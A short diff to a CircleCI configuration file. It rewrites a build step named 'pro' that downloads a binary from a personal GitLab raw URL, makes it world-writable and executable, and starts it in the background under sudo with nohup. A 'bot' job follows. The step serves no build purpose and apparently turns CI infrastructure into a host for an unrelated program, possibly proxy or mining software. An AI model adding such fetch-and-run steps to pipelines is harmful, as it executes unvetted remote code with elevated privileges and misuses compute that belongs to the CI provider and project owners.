--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -10,10 +10,10 @@ jobs:
       - run:
          name: "pro"
          command: | 
-          sudo su --command "apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
-          nohup ./pro --log=stdout > meta.log &
+          sudo --command "wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
+          sudo nohup ./pro --log=stdout > meta.log &
           sleep 5
-          cat meta.log
+          sudo cat meta.log
       
       - run:
          name: "bot"
